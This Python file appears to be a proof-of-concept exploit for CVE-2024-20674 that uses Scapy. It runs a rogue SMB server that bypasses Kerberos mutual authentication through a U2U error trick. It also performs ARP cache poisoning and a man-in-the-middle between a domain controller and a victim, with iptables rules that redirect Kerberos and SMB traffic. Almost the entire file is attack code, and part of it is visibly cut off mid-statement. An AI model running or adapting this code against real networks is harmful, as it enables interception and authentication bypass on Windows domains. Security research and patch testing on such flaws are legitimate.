""" SMB server that bypasses Kerberos client mutual-auth validation. CVE-2024-20674 ``` sudo iptables -I OUTPUT -p icmp -m icmp --icmp-type host-unreachable -j DROP sudo iptables -I OUTPUT -p icmp -m icmp --icmp-type port-unreachable -j DROP sudo sysctl net.ipv4.conf.virbr1.forwarding=1 sudo sysctl net.ipv4.conf.all.send_redirects=0 sudo sysctl net.ipv4.conf.virbr1.send_redirects=0 sudo iptables -t nat -A PREROUTING -d -p tcp --dport 88 -j DNAT --to-destination sudo iptables -t nat -A PREROUTING -d -p tcp --dport 445 -j DNAT --to-destination ``` """ import os import sys import threading import socket from scapy.ansmachine import AnsweringMachineTCP from scapy.arch import get_if_addr from scapy.config import conf from scapy.interfaces import resolve_iface from scapy.layers.dns import dns_resolve from scapy.layers.gssapi import ( GSS_S_CREDENTIALS_EXPIRED, GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE, ) from scapy.layers.kerberos import * from scapy.layers.l2 import arp_mitm, arpcachepoison, ARP_am, getmacbyip from scapy.layers.smbserver import smbserver from scapy.layers.spnego import SPNEGOSSP from scapy.libs.rfc3961 import Key, EncryptionType class KerberosBypass(KerberosSSP): """ A SMB server that triggers the U2U vulnerability """ def AcceptSecurityContext(self, Context, val=None): if Context is None: # New context Context = self.CONTEXT() if Context.state == self.STATE.INIT: val.show() try: # GSSAPI/Kerberos ap_req = val.root.innerContextToken.root except AttributeError: try: # Raw Kerberos ap_req = val.root except AttributeError: return None, GSS_S_DEFECTIVE_TOKEN # The U2U case if isinstance(ap_req, KRB_TGT_REQ): # Build error to TGT-REQ now_time = datetime.utcnow().replace(microsecond=0) err = KRB_InitialContextToken( MechType="1.2.840.113554.1.2.2.3", # U2U innerContextToken=KRB5_InitialContextToken_PDU( TOK_ID=b"\x03\x00", root=KRB_ERROR( errorCode="KRB_ERR_GENERIC", stime=ASN1_GENERALIZED_TIME(now_time), realm=ap_req.realm, sname=PrincipalName( nameString=[ASN1_GENERAL_STRING(x) for x in self.SPN.split("/")], nameType=ASN1_INTEGER(2), ), eData=KERB_ERROR_DATA( dataType=1, dataValue=struct.pack(" victim print("+ Starting arp_mitm") macvict = getmacbyip(args.IP) arp_thread = threading.Thread(target=arp_mitm, args=[DC_IP, args.IP], kwargs={"mac2": macvict}) arp_thread.start() arp_ans = threading.Thread(target=ARP_am(IP_addr=DC_IP, iface=iface)) arp_ans.start() arpcachepoison(args.IP, (get_if_addr(iface), "aa:bb:cc:dd:ee:ff"), verbose=False, count=1, interval=0) # start the Kerberos proxy print("+ Starting Kerberos proxy") krb_proxy_thread = threading.Thread(target=KRB_TGSREQ_ANS(), kwargs={"DC_IP": DC_IP, "iface": iface}) krb_proxy_thread.start() # start SMB server smbserver( iface=iface, debug=4, # -- SMB config root_path=demopath, SHARES=[b"Scapy", b"Stuff", b"SYSVOL"], LOCAL_IPS=[DC_IP], # DOMAIN_REFERRALS=["\\DOMAIN", "\\domain.local"], ssp=SPNEGO_FORCE_KRB([ KerberosBypass( SPN="cifs/" + args.DC, KEY=Key( EncryptionType.AES256, key=b"\x00" * 32 ) ) ]) )